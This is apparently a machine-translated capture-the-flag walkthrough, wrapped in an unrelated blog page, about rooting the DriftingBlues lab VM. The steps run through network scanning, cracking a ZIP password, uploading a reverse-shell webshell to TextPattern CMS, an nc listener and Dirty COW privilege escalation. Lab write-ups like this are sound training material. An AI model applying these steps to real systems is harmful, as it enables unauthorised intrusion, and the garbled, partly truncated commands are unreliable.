RecyclerView list Load the picture to refresh the flashing problem Bigsea


target address:,672/

1, the host to explore

ARP -SCAN -i ETH0 -L (specified network card scan) Scan all devices of the LAN (all device IP, MAC address, manufacturer information)
MASSCAN -P 80,22 (network segment scanned by Masscan -P scan port number)
NetDiscover -i ETH0 -R
nmap -sn

2, port scan

nmap -sS -A -sV -T4 -p-
80—http—Apache httpd 2.2.22 ((Debian))

3, 80 access, you can find nothing, check the source code, then scan a wave of directory

gobuster dir -u “” -w /root/tools/directory-list-2.3-medium.txt -x php,html,txt,zip,bak

See the familiar old friend: /robots.txt, visit as follows

User-agent: *
Disallow: /textpattern/textpattern

dont forget to add .zip extension to your dir-brute

Visit/TextPattern/TextPattern/see the following在这里插入图片描述
Fingerprint recognition is TextPattern CMS
ROBOTS.TXT also prompts not to forget the ZIP, see that / in the scanning result, download a compressed package, try to open up a password with a password
4. Use Kali to crack the ZIP compressed package password

1、zip2john > password.txt
2、john –wordlist=/usr/share/wordlists/rockyou.txt password.txt

The password is: myspace4, after decompression file, open the file and check the file content to get the account password Mayer: Lionheart
5. After entering, I see that the CMS version is 4.8.3

Think 1: Kali Local Search Vulnerability: Searchsploit TextPattern 4.8.3, after testing and failure
Think 2: Find and use points on the background page

In Content, I found the existing file upload
Upload our rebound shell horse (note that the IP and ports of the Marili face must be changed to your own Kali IP), there is no way to display
But we can see the upload address on the admin management interface

kali Start supervision: NC -LVNP 1234 
 Visit our horses to get a rebound shell 

 Use python to switch to Bash: python -c 'Import Pty; pty.spawn ("/bin/bash")'

6. Try to mention rights

1. Try SUID to mention: Find/-PERM -U = S -Type F 2>/DEV/NULL 
 In https: / 

 2. Uname -A 
 Linux DriftingBlues 3.2.0-4-AMD

Then we use login Firefart, the password is entered by ourselves (I entered root) to get root permissions

1. Information collection Get sensitive file
2, ZIP2JOHN+JOHN cracking ZIP password
3. Use the background file to upload to get webshell
4, dirty cattle to get right to get root permissions

End of scattered flowers ~

Peng Group Safety Master provided WP


Related Posts

Black Horse Programmer -Foundation framework NSFileManager introduction and usage

[A must -have for the interview] In 2021, you are just a notes with bytes. The content is too real.

React-PARTICLE-JS particle effects realized, browser report error issues

APP Store to add new applications

RecyclerView list Load the picture to refresh the flashing problem Bigsea

Random Posts

MFC+OpenCV3.3.1+Display image video+water level recognition

bzoj 4012: [hnoi2015] Opening the store -dynamic tree division governance

Docker lightweight management tool Portainer Xinghe

javascript’s thousands of points and remove thousands of points

database engineering -mybatis (1)